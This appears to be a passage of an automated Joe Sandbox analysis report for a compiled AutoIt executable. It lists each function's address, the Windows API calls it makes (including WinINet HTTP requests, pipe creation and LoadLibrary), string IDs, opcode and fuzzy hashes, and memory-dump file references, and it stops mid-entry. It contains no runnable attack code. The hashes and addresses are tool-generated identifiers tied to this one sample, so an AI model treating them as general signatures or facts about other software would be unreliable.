                                                    • Opcode ID: a75caf38f1a0dcf7832a177602a4ab4cc9c266c531dbb972171d4ed3a4966c2d
                                                    • Instruction ID: 7646bbe66d4d4a3fc096585f99bc2ae2bcc8e6f7ccd463646b6935d95ff9d6a0
                                                    • Opcode Fuzzy Hash: a75caf38f1a0dcf7832a177602a4ab4cc9c266c531dbb972171d4ed3a4966c2d
                                                    • Instruction Fuzzy Hash: CBF03A3A144612BBDB111BA4FC8C9EA773BAF45312B101672F202910A0DB755A11CB50
                                                    Function 00658E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00658E7F
                                                    • UnloadUserProfile.USERENV(?,?), ref: 00658E8B
                                                    • CloseHandle.KERNEL32(?), ref: 00658E94
                                                    • CloseHandle.KERNEL32(?), ref: 00658E9C
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00658EA5
                                                    • HeapFree.KERNEL32(00000000), ref: 00658EAC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                    • String ID:
                                                    • API String ID: 146765662-0
                                                    • Opcode ID: 0abe057741b9079191b566f56b8278fb96e8349dbc93dfe117031a251d21f99a
                                                    • Instruction ID: f13235abed3b48c4496d8f75ffa8664514502075af5ca91ac6e19c98650edb84
                                                    • Opcode Fuzzy Hash: 0abe057741b9079191b566f56b8278fb96e8349dbc93dfe117031a251d21f99a
                                                    • Instruction Fuzzy Hash: 25E05276104505FBDB011FE5EC0C95ABB7AFB89762B509731F219C1474CB329461DB90
                                                    Function 00657A78 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00692C7C,?), ref: 00657C32
                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00692C7C,?), ref: 00657C4A
                                                    • CLSIDFromProgID.OLE32(?,?,00000000,0068FB80,000000FF,?,00000000,00000800,00000000,?,00692C7C,?), ref: 00657C6F
                                                    • _memcmp.LIBCMT ref: 00657C90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: FromProg$FreeTask_memcmp
                                                    • String ID: ,,i
                                                    • API String ID: 314563124-3276395716
                                                    • Opcode ID: d88e9d0008a0969b8faadd575d02571032bcc8b1638ab7f5c7c5a9f24e482bbe
                                                    • Instruction ID: 9e0b92aec453f3b7b76462bae75bd058c3230b2f59bc0b28a260a85b6f844586
                                                    • Opcode Fuzzy Hash: d88e9d0008a0969b8faadd575d02571032bcc8b1638ab7f5c7c5a9f24e482bbe
                                                    • Instruction Fuzzy Hash: 0C81FD75A00109EFCB04DF94D984DEEB7BAFF89315F204598F915AB250DB71AE0ACB60
                                                    Function 00678902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 00678928
                                                    • CharUpperBuffW.USER32(?,?), ref: 00678A37
                                                    • VariantClear.OLEAUT32(?), ref: 00678BAF
                                                      • Part of subcall function 00667804: VariantInit.OLEAUT32(00000000), ref: 00667844
                                                      • Part of subcall function 00667804: VariantCopy.OLEAUT32(00000000,?), ref: 0066784D
                                                      • Part of subcall function 00667804: VariantClear.OLEAUT32(00000000), ref: 00667859
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                    • API String ID: 4237274167-1221869570
                                                    • Opcode ID: cdd9244f85f90c39c2280064e63f6c87ca771987ca9d5f32fa36459889205965
                                                    • Instruction ID: 582c1cc1b8f25a96a06aea5ef2ddcd182a55b1bc04eff2057948528504845dfe
                                                    • Opcode Fuzzy Hash: cdd9244f85f90c39c2280064e63f6c87ca771987ca9d5f32fa36459889205965
                                                    • Instruction Fuzzy Hash: CC918E716483019FC744DF28C48495BBBE6EF88714F14896EF88A8B3A2DB31ED45CB52
                                                    Function 00662F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0061FEC6: _wcscpy.LIBCMT ref: 0061FEE9
                                                    • _memset.LIBCMT ref: 00663077
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006630A6
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00663159
                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00663187
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                    • String ID: 0
                                                    • API String ID: 4152858687-4108050209
                                                    • Opcode ID: 49ff7cde94eb955a5421596e7e01971069715aa2607388719753097e31c5ba9f
                                                    • Instruction ID: f83f33755c603fe39d51c3e39be73f30e9f00edfa8e9b5051e47cbd41384271f
                                                    • Opcode Fuzzy Hash: 49ff7cde94eb955a5421596e7e01971069715aa2607388719753097e31c5ba9f
                                                    • Instruction Fuzzy Hash: 8C51F2316083219FD7659F28D845AABBBEAEF56310F040A2DF885D73D1DB70CE448B96
                                                    Function 00662C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00662CAF
                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00662CCB
                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00662D11
                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,006C6890,00000000), ref: 00662D5A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Menu$Delete$InfoItem_memset
                                                    • String ID: 0
                                                    • API String ID: 1173514356-4108050209
                                                    • Opcode ID: b77d01f6f44e05f4aaec8e4300219bfc9c92d687187b8fe079a5c008358137b7
                                                    • Instruction ID: eedc220385658052907d1525c027018fc350e625035c523dbdd2a682243d6b4e
                                                    • Opcode Fuzzy Hash: b77d01f6f44e05f4aaec8e4300219bfc9c92d687187b8fe079a5c008358137b7
                                                    • Instruction Fuzzy Hash: B5418C30204702AFD724DF24C855B5ABBAAEF85320F14462DE965972E1D770E904CBA6
                                                    Function 0067DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0067DAD9
                                                      • Part of subcall function 006079AB: _memmove.LIBCMT ref: 006079F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: BuffCharLower_memmove
                                                    • String ID: cdecl$none$stdcall$winapi
                                                    • API String ID: 3425801089-567219261
                                                    • Opcode ID: 372191bdd5865fbcc2f895678b4423e866071b65a107f9c79a458cf2300bdf00
                                                    • Instruction ID: c8187a2f138eacfd4802bed25d16cde10530c0dc73a6369d3bfd48488499380c
                                                    • Opcode Fuzzy Hash: 372191bdd5865fbcc2f895678b4423e866071b65a107f9c79a458cf2300bdf00
                                                    • Instruction Fuzzy Hash: 3131A3B090061AAFCF04EF54C8819EEB7B6FF05710B108A2DE869977D2DB71A905CB94
                                                    Function 00659372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                      • Part of subcall function 0065B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0065B0E7
                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 006593F6
                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00659409
                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00659439
                                                      • Part of subcall function 00607D2C: _memmove.LIBCMT ref: 00607D66
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$_memmove$ClassName
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 365058703-1403004172
                                                    • Opcode ID: 39b8e1038c4c94d430521f6dc141ec2f473cdd1f41c2efd259580481c4ee776d
                                                    • Instruction ID: b42829650461490347476ac6457620557094b456f305a4f9db43460601d544f6
                                                    • Opcode Fuzzy Hash: 39b8e1038c4c94d430521f6dc141ec2f473cdd1f41c2efd259580481c4ee776d
                                                    • Instruction Fuzzy Hash: C621A071980108BADB18AB64DC858FFB7AADF05360F10422DF926972E1DB355E4A9A20
                                                    Function 00671B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00671B40
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00671B66
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00671B96
                                                    • InternetCloseHandle.WININET(00000000), ref: 00671BDD
                                                      • Part of subcall function 00672777: GetLastError.KERNEL32(?,?,00671B0B,00000000,00000000,00000001), ref: 0067278C
                                                      • Part of subcall function 00672777: SetEvent.KERNEL32(?,?,00671B0B,00000000,00000000,00000001), ref: 006727A1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                    • String ID:
                                                    • API String ID: 3113390036-3916222277
                                                    • Opcode ID: be48047bf1e8d3a69b601dc4ac17df4b2d818ea12a194dcaea5cc768505d133e
                                                    • Instruction ID: 158b5d459818fe5bab93cca01e24b3a1b1a9ffe12b7bbe3db7da5a11d3ca824f
                                                    • Opcode Fuzzy Hash: be48047bf1e8d3a69b601dc4ac17df4b2d818ea12a194dcaea5cc768505d133e
                                                    • Instruction Fuzzy Hash: AF2195715002087FEB119F64DC85EBF77EEEB4AB44F10811FF549AA240EB249D055765
                                                    Function 00686656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00601D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00601D73
                                                      • Part of subcall function 00601D35: GetStockObject.GDI32(00000011), ref: 00601D87
                                                      • Part of subcall function 00601D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00601D91
                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 006866D0
                                                    • LoadLibraryW.KERNEL32(?), ref: 006866D7
                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 006866EC
                                                    • DestroyWindow.USER32(?), ref: 006866F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                    • String ID: SysAnimate32
                                                    • API String ID: 4146253029-1011021900
                                                    • Opcode ID: 838590e6fc0fe11b55b6acef54d4aaca9ae06c3dfc9e0ad829ce657ff019da7f
                                                    • Instruction ID: 6fbf4cde7b14c92a977bcf9d0094a2da89bea715a4b06a7ca90c7edc6ae00be0
                                                    • Opcode Fuzzy Hash: 838590e6fc0fe11b55b6acef54d4aaca9ae06c3dfc9e0ad829ce657ff019da7f
                                                    • Instruction Fuzzy Hash: 8B219F71100245BBEF106F64EC80EFB37AEEF59368F104729F91096290E7B2CC9197A2
                                                    Function 0066703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 0066705E
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00667091
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 006670A3
                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 006670DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: ad1d950d23706a91073ea9de6b15ea46703f4093556cf2dc5fd13da137f8bdca
                                                    • Instruction ID: 30029a9306a851ce34c6d701d4b37c1821cee539166756264bcede9482d41bb1
                                                    • Opcode Fuzzy Hash: ad1d950d23706a91073ea9de6b15ea46703f4093556cf2dc5fd13da137f8bdca
                                                    • Instruction Fuzzy Hash: B42160B4508209ABDB209F79DC05A9A77BABF44728F204A19FDA1D73D0E771A950CB60
                                                    Function 0066710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 0066712B
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0066715D
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 0066716E
                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006671A8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: 5edc7110ce0f37bf3719d3345dac4514a5834f5d41583d84e018965fcc34e687
                                                    • Instruction ID: cab91cceb311699dee2b32cf92ea1e5b244e11312d32726f35c4c5464b672b64
                                                    • Opcode Fuzzy Hash: 5edc7110ce0f37bf3719d3345dac4514a5834f5d41583d84e018965fcc34e687
                                                    • Instruction Fuzzy Hash: A921B375504205ABDB209F68DC04A9AF7EAAF56738F24071AFDB0D33D0D770A941CB50
                                                    Function 0066AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0066AEBF
                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0066AF13
                                                    • __swprintf.LIBCMT ref: 0066AF2C
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0068F910), ref: 0066AF6A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                    • String ID: %lu
                                                    • API String ID: 3164766367-685833217
                                                    • Opcode ID: 99ffc1cc48034fe1a717ca941fcf56cc782687152b8deb371c47da216068da94
                                                    • Instruction ID: e6cd6cea525c72d93236b0892139e985da0a7df2560f4e7123f2910902161add
                                                    • Opcode Fuzzy Hash: 99ffc1cc48034fe1a717ca941fcf56cc782687152b8deb371c47da216068da94
                                                    • Instruction Fuzzy Hash: 37217434600109AFCB50DFA5C985DAF77BAEF49704B004069F905EB252DB31EA45CB61
                                                    Function 0065A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00607D2C: _memmove.LIBCMT ref: 00607D66
                                                      • Part of subcall function 0065A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0065A399
                                                      • Part of subcall function 0065A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0065A3AC
                                                      • Part of subcall function 0065A37C: GetCurrentThreadId.KERNEL32 ref: 0065A3B3
                                                      • Part of subcall function 0065A37C: AttachThreadInput.USER32(00000000), ref: 0065A3BA
                                                    • GetFocus.USER32 ref: 0065A554
                                                      • Part of subcall function 0065A3C5: GetParent.USER32(?), ref: 0065A3D3
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0065A59D
                                                    • EnumChildWindows.USER32(?,0065A615), ref: 0065A5C5
                                                    • __swprintf.LIBCMT ref: 0065A5DF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                    • String ID: %s%d
                                                    • API String ID: 1941087503-1110647743
                                                    • Opcode ID: 524c84bcfb892df0a88f632af11038c55f0eedcdf3997853a6449b3dcbb099bf
                                                    • Instruction ID: 5aac0426410c642ca19fe1fcde4fadffde506e7fef7b182caf3f871af6cb0bfc
                                                    • Opcode Fuzzy Hash: 524c84bcfb892df0a88f632af11038c55f0eedcdf3997853a6449b3dcbb099bf
                                                    • Instruction Fuzzy Hash: 1C11A571640209BBDF50BFA0DC85FEA377AAF48701F044279BD089A192DA7459498B79
                                                    Function 00662017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 00662048
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                    • API String ID: 3964851224-769500911
                                                    • Opcode ID: b04dbbfb725d6fa447e318ed07e2e1522d6d8fb7289e32fb932dbabf8eb985db
                                                    • Instruction ID: 49ddc69140901d27426b97ac4375a2c8fdb367930e09d63d59c917381dfaa037
                                                    • Opcode Fuzzy Hash: b04dbbfb725d6fa447e318ed07e2e1522d6d8fb7289e32fb932dbabf8eb985db
                                                    • Instruction Fuzzy Hash: 72116D70D4051ADFCF40EFA8D8914EEB7B6FF15304B508968D855A7392EB326916CF50
                                                    Function 0067EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0067EF1B
                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0067EF4B
                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0067F07E
                                                    • CloseHandle.KERNEL32(?), ref: 0067F0FF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
